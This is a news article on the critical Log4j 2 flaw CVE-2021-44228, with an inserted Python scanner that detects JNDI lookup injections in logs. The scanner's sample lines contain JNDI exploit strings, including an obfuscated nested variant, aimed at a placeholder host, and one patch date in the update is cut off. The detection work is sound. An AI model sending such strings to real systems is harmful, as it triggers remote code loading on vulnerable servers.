
Critical Apache Log4j 2 bug under attack; mitigate now

The Log4j 2 flaw has a base CVSS score of 10 and enables remote code execution against applications, cloud services and PC games with vulnerable configurations.

A recently discovered vulnerability in Log4j 2 is reportedly being exploited in the wild, putting widely used applications and cloud services at risk.

Log4j 2 is a popular Java logging framework developed by the Apache Software Foundation. The vulnerability, CVE-2021-44228, allows for remote code execution against users with certain standard configurations in prior versions of Log4j 2. As of Log4j 2.15.0 (released on Dec. 6), the vulnerable configurations have been disabled by default.

CVE-2021-44228 is considered a critical flaw, and it has a base CVSS score of 10 -- the highest possible severity rating.

Apache described the flaw, credited to Chen Zhaojun of Alibaba Cloud Security Team, on its Log4j2 vulnerabilities page as follows:

"Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI [Java Naming and Directory Interface] related endpoints," the description reads. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default."

Users with previous versions can also mitigate the flaw by changing their configuration.
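For teams hunting for attempts against this class of flaw in their own logs, here is an added example (not from the article, and not Apache's code): a Python scanner that evaluates Log4j-style nested lookups before matching, because a match on the literal text alone misses a JNDI lookup that has been assembled from pieces. The sample log lines are constructed, and `lookup.invalid` is a placeholder host.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not from any real system): a benign request,
# one whose User-Agent carries a JNDI lookup, and one that assembles the same
# lookup from a nested lookup so that a naive substring match would miss it.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://lookup.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET /login HTTP/1.1" 200 "${${lower:J}ndi:ldap://lookup.invalid/b}"',
]

# An innermost ${...} lookup: its body contains no further "${".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup of any scheme, matched on the normalized text.
_JNDI = re.compile(r"\$\{\s*jndi:[^}]*\}", re.IGNORECASE)

def _resolve(match: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way Log4j 2 does for the few lookups
    that need no external data; anything else (jndi included) is left as is."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # ${name:-default}: an unresolvable name yields the default
        return body.split(":-", 1)[1]
    return match.group(0)

def normalize_lookups(text: str) -> str:
    """Evaluate innermost lookups until the text stops changing."""
    while True:
        new_text = _INNERMOST.sub(_resolve, text)
        if new_text == text:
            return text
        text = new_text

def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized lookup) for each JNDI lookup found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hits.extend((number, found) for found in _JNDI.findall(normalize_lookups(line)))
    return hits

if __name__ == "__main__":
    for number, lookup in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: {lookup}")
```

The same normalization applies to any field an attacker can influence that ends up in a log statement, not only the User-Agent shown here.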

The vulnerability first became publicly known when a security researcher shared a proof-of-concept exploit of the then-unknown bug on Twitter Thursday morning. Since then, the bug has been assigned a CVE and has already been used in attacks, according to reports from New Zealand's Computer Emergency Response Team (CERT), Cloudflare and others.

Additionally, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory Friday encouraging users and administrators to apply the appropriate mitigations.

Several security vendors and threat researchers have noted that Log4j 2 is used in many major cloud services, applications and PC games, including Apple iCloud, Minecraft and Cloudflare. Minecraft published an advisory Friday that said the company had addressed the Log4j 2 vulnerability but urged players and Minecraft server hosts to take additional steps to protect themselves.

Cloudflare sent the following statement to SearchSecurity: 

"We have no evidence of exploitation of us. We responded quickly to evaluate all potential areas of risk and updated our software to prevent attacks, and have not been able to replicate any external claims that we might be at risk. You can read more on our blog, and more details on the vulnerability can be found on the official Log4j security page."

Apache had not responded to SearchSecurity's questions as of press time.

UPDATE 12/10: An Apache Software Foundation (ASF) spokesperson said that, according to the Apache Logging Services Project Management Committee, the group was first contacted about CVE-2021-44228 late last month. The ASF Security Team received the vulnerability report on Nov. 24, responded to the researcher on Nov. 26, and released a patch on Dec.; the spokesperson said the disclosure timeline dates may be approximate because of time zone differences.

Alexander Culafi is a writer, journalist and podcaster based in Boston.
